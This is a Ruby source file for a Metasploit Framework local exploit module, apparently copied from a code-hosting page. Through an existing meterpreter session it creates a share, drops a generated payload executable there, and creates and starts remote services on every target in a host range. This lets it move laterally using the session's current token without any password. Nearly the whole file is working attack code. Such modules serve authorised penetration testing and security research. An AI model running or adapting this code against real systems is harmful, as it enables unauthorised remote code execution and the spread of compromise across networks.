138 lines
4.5 KiB
Ruby
138 lines
4.5 KiB
Ruby
##
|
|
# $Id$
|
|
##
|
|
|
|
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# Framework web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/framework/
|
|
##
|
|
|
|
require 'msf/core'
|
|
require 'rex'
|
|
require 'msf/core/post/windows/services'
|
|
require 'msf/core/post/common'
|
|
require 'msf/core/post/file'
|
|
|
|
class Metasploit3 < Msf::Exploit::Local
|
|
Rank = ExcellentRanking
|
|
|
|
include Post::Common
|
|
include Post::Windows::WindowsServices
|
|
include Exploit::EXE
|
|
include Post::File
|
|
|
|
def initialize(info={})
|
|
super( update_info( info,
|
|
'Name' => 'PsExec via Current User Token',
|
|
'Description' => %q{
|
|
This module uploads an executable file to the victim system, creates
|
|
a share containing that executable, creates a remote service on each
|
|
target system using a UNC path to that file, and finally starts the
|
|
service(s).
|
|
|
|
The result is similar to psexec but with the added benefit of using
|
|
the session's current authentication token instead of having to know
|
|
a password or hash.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [
|
|
'egypt',
|
|
'jabra' # Brainstorming and help with original technique
|
|
],
|
|
'References' => [
|
|
# same as for windows/smb/psexec
|
|
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
|
|
[ 'OSVDB', '3106'],
|
|
[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
|
|
],
|
|
'DisclosureDate' => 'Jan 01 1999',
|
|
'Version' => '$Revision$',
|
|
'Platform' => [ 'windows' ],
|
|
'SessionTypes' => [ 'meterpreter' ],
|
|
'Targets' => [ [ 'Universal', {} ] ],
|
|
'DefaultTarget' => 0
|
|
))
|
|
|
|
register_options([
|
|
OptString.new("INTERNAL_ADDRESS", [
|
|
false,
|
|
"Session's internal address or hostname for the victims to grab the "+
|
|
"payload from (Default: detected)"
|
|
]),
|
|
OptString.new("NAME", [ false, "Service name on each target in RHOSTS (Default: random)" ]),
|
|
OptString.new("DISPNAME", [ false, "Service display name (Default: random)" ]),
|
|
OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
|
|
])
|
|
end
|
|
|
|
def exploit
|
|
name = datastore["NAME"] || Rex::Text.rand_text_alphanumeric(10)
|
|
display_name = datastore["DISPNAME"] || Rex::Text.rand_text_alphanumeric(10)
|
|
|
|
# XXX Find the domain controller
|
|
|
|
#share_host = datastore["INTERNAL_ADDRESS"] || detect_address
|
|
share_host = datastore["INTERNAL_ADDRESS"] || session.session_host
|
|
print_status "Using #{share_host} as the internal address for victims to get the payload from"
|
|
|
|
# Build a random name for the share and directory
|
|
share_name = Rex::Text.rand_text_alphanumeric(8)
|
|
drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
|
|
share_dir = "#{drive}\\#{share_name}"
|
|
|
|
# Create them
|
|
print_status("Creating share #{share_dir}")
|
|
session.fs.dir.mkdir(share_dir)
|
|
cmd_exec("net share #{share_name}=#{share_dir}")
|
|
|
|
# Generate an executable from the shellcode and drop it in the share
|
|
# directory
|
|
filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
|
|
payload_exe = generate_payload_exe_service(
|
|
:servicename => name,
|
|
# XXX Ghetto
|
|
:arch => payload.send(:pinst).arch.first
|
|
)
|
|
|
|
print_status("Dropping payload #{filename}")
|
|
write_file("#{share_dir}\\#{filename}", payload_exe)
|
|
|
|
service_executable = "\\\\#{share_host}\\#{share_name}\\#{filename}"
|
|
|
|
begin
|
|
Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
|
|
begin
|
|
print_status("#{server.ljust(16)} Creating service #{name}")
|
|
|
|
# 3 is Manual startup. Should probably have constants for this junk
|
|
service_create(name, display_name, service_executable, 3, server)
|
|
|
|
# If everything went well, this will create a session. If not, it
|
|
# might be permissions issues or possibly we failed to create the
|
|
# service.
|
|
print_status("#{server.ljust(16)} Starting the service")
|
|
service_start(name, server)
|
|
|
|
print_status("#{server.ljust(16)} Deleting the service")
|
|
service_delete(name, server)
|
|
rescue
|
|
print_error("Exception running payload: #{$!.class} : #{$!}")
|
|
print_error("#{server.ljust(16)} WARNING: May have failed to clean up!")
|
|
print_error("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}")
|
|
next
|
|
end
|
|
end
|
|
ensure
|
|
print_status("Deleting share #{share_name}")
|
|
cmd_exec("net share #{share_name} /delete /y")
|
|
print_status("Deleting files #{share_dir}")
|
|
cmd_exec("cmd /c rmdir /q /s #{share_dir}")
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|